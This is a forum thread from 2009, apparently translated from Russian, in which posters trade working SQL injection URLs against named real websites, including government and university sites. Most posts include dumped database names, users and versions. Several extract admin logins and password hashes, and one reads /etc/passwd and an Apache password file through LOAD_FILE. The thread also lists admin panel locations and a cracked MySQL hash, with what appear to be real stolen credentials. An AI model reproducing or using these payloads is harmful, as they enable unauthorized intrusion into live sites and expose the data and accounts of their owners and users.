SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. f1ng3r

    Code:
    http://www.eurosfaire.prd.fr/news/consulter.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    Database Version : 4.0.24_Debian-10sarge3-log
    Database name : eurosfaire
    User name : eurosfaire@granit


    ----------------------------------------------------------+

    Code:
    http://www.poker-carredas.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11--

    Database Version : 4.0.25-standard-log
    Database name : pokercar
    User name : [email protected]


    ----------------------------------------------------------+

    Code:
    http://fr.apa.az/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version() ,database(),user()),4,5,6,7,8,9,10,11,12,13--
    Database Version : 5.0.67-community
    Database name : apaadm_fr
    User name : apaadm_user@localhost
     
    #7841 f1ng3r, 18 Feb 2009
    Last edited: 18 Feb 2009
    1 person likes this.
  2. ..::TROYAN::..

    Code:
    http://www.stroyportal.su/production.php?comp_id=-4740+union+select+concat_ws(0x3a,user(),database(),version())--
    stroyportal@localhost:stroyportal:4.1.22-log
    PR:5
    TIC:425

    P.S. The info is output in the title.
     
  3. Gorev

    http://www.ior.ro/produse/index.php?kCtg=9&ID=-48+union+select+1,2,3,4,5,6,7,convert(concat_ws(0x3a,version(),database(),user())+using+binary),9,0--




    Version : 4.1.11-Debian_4sarge7-log
    Database : dbior
    User : ior@localhost
     
  4. M.W.N.N.

    http://doska.minsk-in.net/showit.php?podrobnoid=5416%27+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/*


    Version : 4.1.22-log
    Database : minskin9_new
    User : minskin9_admin@localhost


    http://www.ourkids.net/news/article.php?nid=50%27+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+limit+1,1/*

    Version : 4.1.20
    Database : News
    User : webuser@localhost
     
    #7844 M.W.N.N., 18 Feb 2009
    Last edited: 18 Feb 2009
  5. Kraneg

    research.ohiou.edu
    Code:
    http://www.research.ohiou.edu/index.php?section=5&page=-230+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14/*
    DB_Ver:4.1.19-log
    DB_User:[email protected]
    DB:vpresearch
     
    1 person likes this.
  6. Gorev

    blind

    http://www.mimteam.ro/index.php?page=3&cat=44+AND+ASCII(SUBSTRING((select+user()),1,1))>80






    Version : 5.0.67-community
    Database : rmim3903_mimteam
    User : rmim3902@localhost
     
  7. b3

    QWERTY cms lite
    http://lacoste-house.org.ua/index.php?act=cat&id=-3+UNION+SELECT+1,2,3,4,concat(pass459khyf,0x3a,secret873ktlW)+from+rkh8t5po
    bpS4B1mq:z56Ntrtlkjbgnticlg1
    real login:password
    admin:bpS4B1mq
    Admin panel:
    http://lacoste-house.org.ua/admin/index.php
    =
    Same CMS:
    http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
    admin:paLz5C9qm1

    http://apeu.org.ua/?id=-3+UNION+SELECT+1,2,3,4,5,6/*
    5.0.41
    user> name:pass
    yyedit:tylj27.hf
    admin> username:password
    Nothing was output

    And 2 more random SQL injections:
    www.letradecanciones.biz/index.php?search=artistname&id=-3003+UNION+SELECT+1
    www.ngo-perspektiva.org.ua/?type=page&id=-3+UNION+SELECT+1,2,3,4,5,6
     
    1 person likes this.
  8. ..::TROYAN::..

    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10--
    [email protected]:5.0.67:b23474
    PR:1
    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+information_schema.tables+limit+0,1--
    Code:
    http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8,9,10+from+users--
    gold:569874123

    P.S. I didn't find the admin panel, or rather I didn't really look for it.
    P.P.S. In general, the studio builds its sites on a leaky CMS; on all of them the admin panel is at /admin.
     
    1 person likes this.
  9. yarbabin

    Code:
    http://www.flightweb.com/filemgmt/singlefile.php?lid=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--
    5.0.67-log
     
    2 people like this.
  10. Gorev

    http://www.tabeleelectronice.ro/detail.php?id=-701+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18&idcat=138





    Database Version: 4.1.22-standard
    Database name: radu_tabele
    User name: radu_cips@localhost
     
    1 person likes this.
  11. M.W.N.N.

    http://www.trade.gov.cn/selloffers.php?cid=272+union+select+1,2,version(),4,5,6,7,8,9,10

    Database Version: 5.0.45-log
    Database name: trade_ec_b2b_export
    User name: [email protected]
     
  12. Kraneg

    cfs.bc.ca - PR6
    Code:
    http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
    DB_Ver:5.0.45-log
    DB_User:cfsbc_2005@localhost
    DB:cfsbc_2005
    Admin panel:
    Code:
    http://www.cfs.bc.ca/admin/
    I read everything in the DB that was accessible to me, but didn't find any users :(

    =========================================================================

    cjsf.ca - PR5
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
    DB_Ver:5.1.28-rc
    DB_User: php@localhost
    DB:cjsfsite
    mysql.user
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9+from+mysql.user--
    root:474b96d173b7c3b8
    Reading /etc/passwd
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9--
    The admin panel is here (but as we can see, it uses basic authorization)
    Code:
    http://www.cjsf.ca/admin/
    Now let's improve our position =) We know where the admin panel is, and we know we need to see where the password file is located, which in turn is specified in .htaccess:
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7,8,9--
    We see that our file is at:
    /usr/local/etc/apache22/htusers
    Reading it:
    Code:
    http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f6574632f61706163686532322f68747573657273),2,3,4,5,6,7,8,9--
    And we see:
    cjsf:E4DngOk3FmdhI
    That seems to be all =)
     
    #7852 Kraneg, 18 Feb 2009
    Last edited: 18 Feb 2009
    2 people like this.
  13. f1ng3r

    PR - 6

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    Database Version : 5.0.45
    Database name : wawwd_main
    User name : wawwd_main@localhost


    getting the users:

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a ,id,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+iLogin+limit+0,1--
    and the admin:

    Code:
    http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a, id,admin_user_name,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+nmail_admin+limit+0,1--
    didn't find the admin panel :mad:
     
  14. spherics

    PageRank = 7


    Microsoft SQL Server 2005 - 9.00.3282.00 (X64) Aug 5 2008 00:48:00 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1


    Current database is : EmpowerCMS


    Current User : webmaster







    Microsoft SQL Server 2000 - 8.00.2050 (Intel X86)
    Mar 7 2008 21:29:56
    Copyright (c) 1988-2003 Microsoft Corporation
    Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)





    Db Name : EMS



    Current User : ODBC_User
     
    #7854 spherics, 19 Feb 2009
    Last edited: 19 Feb 2009
    2 people like this.
  15. R3b

    http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,null,null,concat_ws(0x20,user(),database(),version()),null,null,null,null,null,null,null,null,null,null/*
     
  16. Assembler

    Code:
    http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11,12%20from%20information_schema.tables--
    (all tables)


    Code:
    http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12%20from%20auth-- 
    (admin data)


    Code:
    http://islamnasledie.ru/admin
    (Admin panel)



    admin:269b9cbb1485e341 (Login:Password)

    PS: What kind of encoding is the password in?? Please tell me. I owe you a +
     
    1 person likes this.
  17. Rubaka

    http://www.petazon.com/cat.php?niccer=124+union+select+1,22222,3,4,5,66666,7,8,9999,10,11+limit+1,1/*

    Database Version: 4.0.27-standard
    Database name: petazon_pet
    User name: petazon_pet@localhost

    http://www.pristinemodels.dk/page.php?id=-2+union+select+1,version(),3/*

    Database Version: 5.0.32-Debian_7etch8-log
    Database name: pristinemodels_
    User name: [email protected]


    2 Assembler

    MySQL hash:269b9cbb1485e341:RoSin28
     
    #7857 Rubaka, 19 Feb 2009
    Last edited: 19 Feb 2009
    1 person likes this.
  18. Assembler

    Code:
    http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20group_concat(table_name)%20from%20information_schema.t
    
    ables--
    (all tables, view the page source)

    Code:
    http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20concat_ws(0x3a,ID,username,realname,email,password)%20
    
    from%20mantis_user_table--
    (Admin data)

    Code:
    http://www.ttfinance.ru/admin.php
    (Admin panel)

    1:administrator::[email protected]:074eec0da3d9dcc8e6e8df8cfe566050 (couldn't decrypt it)

    PR=5
    TIC=200

    Rubaka, thanks, I'll give you rep later, can't right now =)
     
  19. B1ade

    4.1.22-standard
    4.0.27-standard
     
    1 person likes this.
  20. spherics

    Version: 5.0.45
    User: mtsmith@localhost
    Database: PDD


    root : 248c0cc52235aa89
     
    4 people like this.